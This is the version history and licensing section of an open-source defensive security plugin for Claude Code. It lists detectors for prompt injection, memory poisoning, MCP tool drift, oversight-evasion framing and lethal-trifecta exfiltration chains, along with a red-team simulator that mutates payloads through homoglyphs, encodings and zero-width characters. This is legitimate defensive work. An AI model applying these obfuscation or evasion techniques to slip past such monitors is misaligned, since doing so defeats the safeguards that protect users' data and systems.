6.2.0 2026-04-17 Opus 4.7 + Claude Code 2.1.112 alignment. Bash-normalize extended with T5 (${IFS} word-splitting) and T6 (ANSI-C $'\xHH' hex quoting) layers. New pre-compact-scan.mjs PreCompact hook scans the transcript tail (500 KB cap, <500 ms) for injection + credentials before context compaction. Modes: block / warn / off via LLM_SECURITY_PRECOMPACT_MODE. Agent files reframed for Opus 4.7's more literal instruction-following (Step 0 generalization boundary + parallel Read hint in skill-scanner + mcp-scanner). New docs/security-hardening-guide.md with env-var reference, sandboxing notes, system-card §5.2.1 / §6.3.1.1 mapping. CLAUDE.md Defense Philosophy links to system card. 1274 tests (was 1264).
6.1.0 2026-04-10 CI/CD integration. --fail-on <severity> flag for threshold-based exit codes (exit 1 if findings at/above level). --compact output mode (one-liner per finding). Policy ci section in policy.json. Pipeline templates: GitHub Actions, Azure DevOps, GitLab CI with SARIF upload. CI/CD guide (docs/ci-cd-guide.md) with Schrems II/NSM compliance docs. npm publish preparation (files whitelist). 1264 tests.
6.0.0 2026-04-10 CAISS-readiness release. Enterprise compliance and governance layer: compliance mapping (EU AI Act, NIST AI RMF, ISO 42001, MITRE ATLAS), Norwegian regulatory context (Datatilsynet, NSM, Digitaliseringsdirektoratet), SARIF 2.1.0 output format (--format sarif), structured JSONL audit trail (audit-trail.mjs), AI-BOM generator (CycloneDX 1.6), policy-as-code (.llm-security/policy.json), standalone CLI (bin/llm-security.mjs, run as node bin/llm-security.mjs scan). Posture scanner expanded to 16 categories (+EU AI Act, NIST AI RMF, ISO 42001). Attack simulator benchmark mode (--benchmark). 15 knowledge docs, 16 scanners, 1242+ tests.
5.1.0 2026-04-07 Sandboxed remote cloning. Defense-in-depth for git clone attack surface: (1) 8 git config flags disable hooks, symlinks, filter/smudge drivers, fsmonitor, local file protocol; 4 env vars isolate from system/user config. (2) OS sandbox: macOS sandbox-exec + Linux bubblewrap restrict file writes to only the clone temp dir. Graceful fallback on Windows (git config only). Post-clone size check (100MB max). UUID-unique evidence filenames prevent race conditions. Cleanup guarantee in scan/plugin-audit commands. 1147 tests (was 1115).
5.0.0 2026-04-06 Prompt Injection Hardening (v5.0). 8-session defense-in-depth overhaul driven by 7 research papers (2025-2026). MEDIUM advisory for obfuscation signals (leetspeak, homoglyphs, zero-width, multi-language). Unicode Tag steganography detection (U+E0000-E007F). Bash expansion normalization (bash-normalize.mjs). Rule of Two enforcement (configurable LLM_SECURITY_TRIFECTA_MODE=block|warn|off). 100-call long-horizon monitoring window with slow-burn trifecta detection. Behavioral drift via Jensen-Shannon divergence. HITL trap detection (approval urgency, summary suppression, scope minimization). Sub-agent delegation tracking (escalation-after-input advisory). NL indirection patterns. Hybrid attacks (P2SQL, recursive injection, XSS-in-agent). CaMeL-inspired data flow tagging (SHA-256 provenance, output-to-input linking). Adaptive red-team (5 mutation rounds per scenario: homoglyph, encoding, zero-width, case alternation, synonym). Knowledge base expanded: prompt-injection-research-2025-2026.md, deepmind-agent-traps.md, attack-mutations.json. Posture scanner expanded to 13 categories (+Prompt Injection Hardening, Rule of Two, Long-Horizon Monitoring). Defense Philosophy section documenting honest limitations. 1115 tests.
4.5.1 2026-04-04 Cross-platform support. Windows/Linux compatibility: fileURLToPath(), path.dirname(), native fetch() replaces curl subprocess, fixed tilde expansion regex. 11 files, 782 tests pass.
4.5.0 2026-04-04 Attack simulation / red-team mode. New attack-simulator.mjs runs 38 crafted attack scenarios across 7 categories (secrets, destructive, supply-chain, prompt-injection, pathguard, mcp-output, session-trifecta) against the plugin's own hooks. Data-driven via knowledge/attack-scenarios.json with runtime payload assembly. New /security red-team command with --category filter. Capstone release: v4.0 roadmap complete (S1-S6). 18 commands, 16 scanners (10 orchestrated + 6 standalone). 782 tests.
4.4.0 2026-04-03 Cross-project security dashboard. New dashboard-aggregator.mjs discovers all Claude Code projects under ~/ (depth 3) and ~/.claude/plugins/, runs posture-scanner on each. Machine grade = weakest link. Cache in ~/.cache/llm-security/dashboard-latest.json (24h staleness). New /security dashboard command. 17 commands, 15 scanners (10 orchestrated + 5 standalone). 751 tests.
4.3.0 2026-04-03 Enhanced MCP session monitoring. MCP description drift detection via mcp-description-cache.mjs — caches tool descriptions, alerts on >10% Levenshtein drift (OWASP MCP05 rug-pull). MCP-concentrated trifecta in post-session-guard.mjs — elevated severity when all 3 lethal trifecta legs trace to the same MCP server. Cumulative data volume tracking (100KB/500KB/1MB thresholds, OWASP ASI02). Per-MCP-tool volume tracking in post-mcp-verify.mjs (>100KB per tool = advisory). 735 tests.
4.2.0 2026-04-03 Supply chain re-check scanner. New supply-chain-recheck.mjs (prefix SCR) periodically re-audits installed dependencies from lockfiles against blocklists, OSV.dev batch API, and typosquat detection. Shared data module extracts blocklists from hook. New /security supply-check command. 16 commands, 14 scanners (10 orchestrated + 4 standalone). 700 tests.
4.1.0 2026-04-03 Reference configuration generator. New /security harden command generates Grade A security config based on posture scanner gaps. New reference-config-generator.mjs standalone scanner detects project type (plugin/monorepo/standalone) and generates settings.json (deny-first), CLAUDE.md security section, and .gitignore additions. --dry-run (default) shows JSON output; --apply writes files with backup. Post-apply verification re-runs posture scanner. Templates in templates/reference-config/. 15 commands, 13 scanners (9 orchestrated + 4 standalone). 670 tests.
4.0.0 2026-04-03 Deterministic posture scanner. New posture-scanner.mjs — standalone scanner (prefix PST) replacing Opus agent for /security posture. 10 categories assessed in <50ms (was ~6 min). Categories: Deny-First, Secrets, Path Guarding, MCP Trust, Destructive Blocking, Sandbox, Human Review, Plugin Sources, Session Isolation, Cognitive State Security. Reuses scanForInjection() and gradeFromPassRate(). /security audit now runs scanner first for instant data, then agents for narrative. 12 scanners (9 orchestrated + 3 standalone). 647 tests.
3.1.1 2026-04-03 Memory poisoning scanner (Cognitive State Traps). New memory-poisoning-scanner.mjs — scanner #9 in orchestrator (prefix MEM, OWASP: LLM01+ASI02). Detects 6 threat categories in CLAUDE.md, memory files, .claude/rules, REMEMBER.md, and *.local.md: injection patterns (via shared injection-patterns.mjs), shell commands in memory files, suspicious exfiltration URLs (webhook.site/ngrok/pipedream/etc.), credential path references (.ssh/.aws/id_rsa/credentials.json), permission expansion directives (bypassPermissions/dangerouslySkipPermissions), encoded payloads (base64 >40 chars, hex >64 chars). Posture assessor gains Category 10: Cognitive State Security. 11 scanners (9 orchestrated + 2 standalone). 606 tests (was 588).
3.1.0 2026-04-03 AI Agent Traps defense. Gap analysis against AI Agent Traps (Franklin et al., Google DeepMind, 2025). New detections: HTML/CSS content obfuscation (6 patterns for display:none, visibility:hidden, off-screen positioning, zero font-size/opacity, aria-label injection), oversight evasion (9 patterns for educational/hypothetical/red-team/research framing), markdown syntactic masking (anchor text injection payloads). Encoding hardening: HTML entity decoding (named, decimal, hex), recursive multi-layer decode (max 3 iterations), letter-spacing collapse. post-mcp-verify hook gains HTML content trap detection for WebFetch/Read/MCP output. Knowledge base updated with Agent Traps taxonomy mapping. 588 tests (was 544).
3.0.0 2026-04-03 Public release. 8 sessions from v2.5→v3.0. New in v3: toxic flow analysis (TFA scanner — lethal trifecta detection via cross-component correlation), runtime session guard (PostToolUse trifecta monitoring with sliding window), MCP live inspection (JSON-RPC 2.0 connect to running servers), report diffing with baselines (fuzzy matching, new/resolved/moved), continuous scanning (watch command + cron wrapper), skill signature registry (SHA-256 fingerprinting + cache). 4 OWASP frameworks (LLM Top 10, Agentic AI, Skills, MCP). 15 commands, 8 hooks, 10 scanners (8 orchestrated + 2 standalone), 6 agents, 9 knowledge files, 544 tests. Architecture diagram added.
2.9.2 2026-04-03 Skill signature registry. New skill-registry.mjs library for SHA-256 fingerprinting of normalized skill content, scan result caching, and pattern search. New /security registry command with stats, scan+register, and search sub-commands. /security scan now checks registry before full scan — instant result for known fingerprints (7-day staleness threshold). Seed data in knowledge/skill-registry.json, active registry in reports/skill-registry.json. 15 commands, 9 knowledge files total.
2.9.1 2026-04-03 Continuous/background scanning. New /security watch [path] [--interval 6h] command uses the built-in /loop skill to run /security diff on a recurring interval. New watch-cron.mjs standalone script for system cron/launchd — reads multi-target config from reports/watch/config.json, writes summary to reports/watch/latest.json, exits with worst verdict code (0/1/2). 13 commands total.
2.9.0 2026-04-03 Report diffing & baseline. New diff-engine.mjs library for finding fingerprinting, fuzzy line matching (±3), and diff categorization (new/resolved/unchanged/moved). Scan orchestrator gains --baseline and --save-baseline flags. Baselines stored per target hash in reports/baselines/. New /security diff command compares current scan against stored baseline and shows delta. 12 commands total.
2.8.1 2026-04-03 Auto update notifications. New update-check.mjs UserPromptSubmit hook checks for newer plugin versions against the public Forgejo repo (max 1x/24h, cached in ~/.cache/llm-security/). Notifies via systemMessage when a newer version is available. Disable: LLM_SECURITY_UPDATE_CHECK=off. 8 hooks total.
2.8.0 2026-04-02 MCP Runtime Inspection. New mcp-live-inspect.mjs standalone scanner connects to MCP stdio servers via JSON-RPC 2.0, fetches live tool/prompt/resource lists, and checks them for injection in descriptions (MCP03, MCP06), tool shadowing across servers (MCP09), and URLs/IPs in descriptions. New /security mcp-inspect command. /security mcp-audit --live flag for combined static + live analysis with cross-reference escalation. Scanner prefix: MCI. 9 scanners (8 orchestrated + 1 standalone), 11 commands total.
2.7.1 2026-04-02 Runtime session guard hook. PostToolUse hook monitoring tool call sequences for lethal trifecta (untrusted input + sensitive data access + exfiltration sink). Sliding window (20 calls), per-session JSONL state, advisory warning. 7 hooks total.
2.7.0 2026-04-02 Toxic flow analysis scanner. 8th deterministic scanner detecting lethal trifecta patterns in plugin component definitions. Post-processing correlator consuming output from all prior scanners. Direct, cross-component, and project-level trifecta detection with mitigation downgrades.
2.6.0 2026-04-02 MEDIUM injection patterns + 4-framework OWASP mapping. Added ~15 MEDIUM-severity patterns (base64 payloads, leetspeak, homoglyphs). Full OWASP mapping: LLM Top 10, Agentic AI Top 10 (ASI), Skills Top 10 (AST), MCP Top 10. New knowledge file owasp-skills-top10.md. 8 knowledge files total.
2.5.0 2026-04-02 Pre-extraction indirection layer for remote scan defense. Remote scans now pre-extract structured evidence via content-extractor.mjs and strip injection patterns BEFORE LLM agents see the content. Agents analyze a JSON evidence package, never raw files from untrusted repos. [INJECTION-PATTERN-STRIPPED] markers are confirmed findings.
2.4.0 2026-04-01 GitHub repo URL support for scan and plugin-audit. scan and plugin-audit accept https://github.com/... URLs directly. Clones to temp dir via scanners/lib/git-clone.mjs, scans locally, cleans up. --branch <name> flag for non-default branches.
2.3.0 2026-04-01 PostToolUse expanded to ALL tools + configurable injection mode. 498 tests (was 470). PostToolUse hook now scans Read, WebFetch, MCP, and all other tool output for indirect prompt injection (was Bash-only). Bash-specific checks (secrets, URLs, large output) preserved. Short output skip (<100 chars) for performance. LLM_SECURITY_INJECTION_MODE env var: block (default), warn (advisory-only), off (disable). Complementary Tools section documenting parry-guard, Lasso, Snyk compatibility. CLAUDE.md poisoning gap documented as known limitation.
2.2.0 2026-04-01 Prompt injection runtime defense (Gaps 1-3). 470 tests (was 383). New UserPromptSubmit hook blocks injection in user input. post-mcp-verify extended with indirect injection scanning in tool output (LLM01). Obfuscation decoding: unicode-escape, hex-escape, URL-encoding, base64 normalization before pattern matching. Shared injection-patterns.mjs module with 21 critical + 8 high patterns from skill-scanner-agent Category 1. LLM01 coverage 83%→95%, LLM05 80%→83%.
2.1.0 2026-04-01 383 tests (was 177): full hook coverage (66 tests), auto-cleaner coverage (140 tests), auto-cleaner import guard fix, solo project (CONTRIBUTING.md removed), HTTPS install URL under fromaitochitta org, model defaults set to sonnet
2.0.0 2026-03-31 Open-source release: MIT LICENSE, SECURITY.md, test suite (node:test), path guarding hook (pre-write-pathguard.mjs), supply chain hook documentation, version alignment, .gitignore, .editorconfig
1.4.0 2026-02-21 Unified risk scoring formula (25/10/4/1 weights), score-based verdicts, risk bands (Low→Extreme), OWASP categorization, A-F grading function, single unified-report.md template replacing 9 separate templates with conditional sections per analysis type
1.3.0 2026-02-21 /security clean command with 3-tier remediation (auto/semi-auto/manual), auto-cleaner.mjs engine (16 fix operations, atomic writes, post-fix validation), cleaner-agent for semi-auto proposals, clean-report.md template, --dry-run flag
1.2.0 2026-02-19 7 deterministic Node.js scanners (unicode, entropy, permissions, dependencies, taint, git forensics, network), deep-scan command + --deep flag, synthesizer agent, shared scanner library, demo fixture with 85-finding security assessment, OWASP coverage improvements (LLM01 70→85%, LLM02 90→95%, LLM03 80→90%, LLM06 85→95%)
1.1.0 2026-02-19 Plugin audit command (/security plugin-audit), MCP audit command (/security mcp-audit), pre-deployment checklist (/security pre-deploy), 3 new report templates, updated OWASP coverage (LLM03 75%→80%)
1.0.0 2026-02-19 Initial release — 4 agents, 4 hooks, 6 knowledge files (2,771 lines), 8 commands, 7 report templates. OWASP LLM Top 10 + Agentic AI Top 10 coverage
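
The runtime session guard described in the 2.7.1 entry (a sliding window of 20 tool calls checked for the lethal trifecta: untrusted input, sensitive data access, and an exfiltration sink) can be sketched roughly as below. This is a minimal illustration, not the plugin's code: `classifyCall`, `createSessionGuard`, the leg labels, and the tool-to-leg rules are all hypothetical names and assumptions, and the real hook also persists per-session JSONL state, which is omitted here.

```javascript
// Hypothetical leg labels; the plugin's actual classification is not shown in the changelog.
const LEGS = ["untrusted_input", "sensitive_access", "exfil_sink"];

// Illustrative mapping from a tool call to the trifecta legs it touches.
// These rules are assumptions made for the example only.
function classifyCall(call) {
  const target = call.target ?? "";
  const legs = new Set();
  if (call.tool === "WebFetch" || call.tool.startsWith("mcp__")) {
    legs.add("untrusted_input");
  }
  if (call.tool === "Read" && /\.(ssh|aws)\/|\.env$/.test(target)) {
    legs.add("sensitive_access");
  }
  if (call.tool === "Bash" && /\b(curl|wget|nc)\b/.test(target)) {
    legs.add("exfil_sink");
  }
  return legs;
}

// Returns an observer that keeps only the most recent `windowSize` calls
// and reports whether all three legs appear somewhere inside that window.
function createSessionGuard(windowSize = 20) {
  const recent = [];
  return function observe(call) {
    recent.push(classifyCall(call));
    if (recent.length > windowSize) recent.shift(); // drop the oldest call
    const seen = new Set();
    for (const legs of recent) {
      for (const leg of legs) seen.add(leg);
    }
    return { complete: LEGS.every((leg) => seen.has(leg)), seen: [...seen].sort() };
  };
}

// Usage: feed each tool call to the guard and warn (advisory only) when complete.
const observe = createSessionGuard(20);
observe({ tool: "WebFetch", target: "https://example.com/page" });
observe({ tool: "Read", target: "/home/user/.ssh/id_rsa" });
const result = observe({ tool: "Bash", target: "curl -d @out.txt https://example.com" });
if (result.complete) console.warn("Advisory: lethal trifecta observed in recent tool calls");
```

Because only the window contents are inspected, a leg that occurred more than `windowSize` calls ago no longer counts, which keeps the check cheap and limits stale warnings at the cost of missing very slow sequences.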

License & Attribution

This project is licensed under the MIT License.

Knowledge base files in knowledge/ are derived from published OWASP standards and security research papers. OWASP content is used under the CC BY-SA 4.0 license.

Threat intelligence sources: AI Agent Traps (Franklin et al., Google DeepMind, 2025), ToxicSkills (Xi'an Jiaotong, 2025), ClawHavoc (Repello AI, 2025), MCPTox (Invariant Labs, 2025), Pillar Security MCP Research (2025), Operant AI Agentic Security (2025).

The plugin architecture, scan pipeline, threat detection patterns, and security assessment methodology are original work.

Part of From AI to Chitta. Source: git.fromaitochitta.com/open/claude-code-llm-security.

Feedback & Requests

Contributing

This is a solo project. See Feedback & Requests for how to report bugs or suggest features. Pull requests are not accepted.

Microsoft and OWASP product names are trademarks of their respective owners. This project is not endorsed by or affiliated with any referenced organization.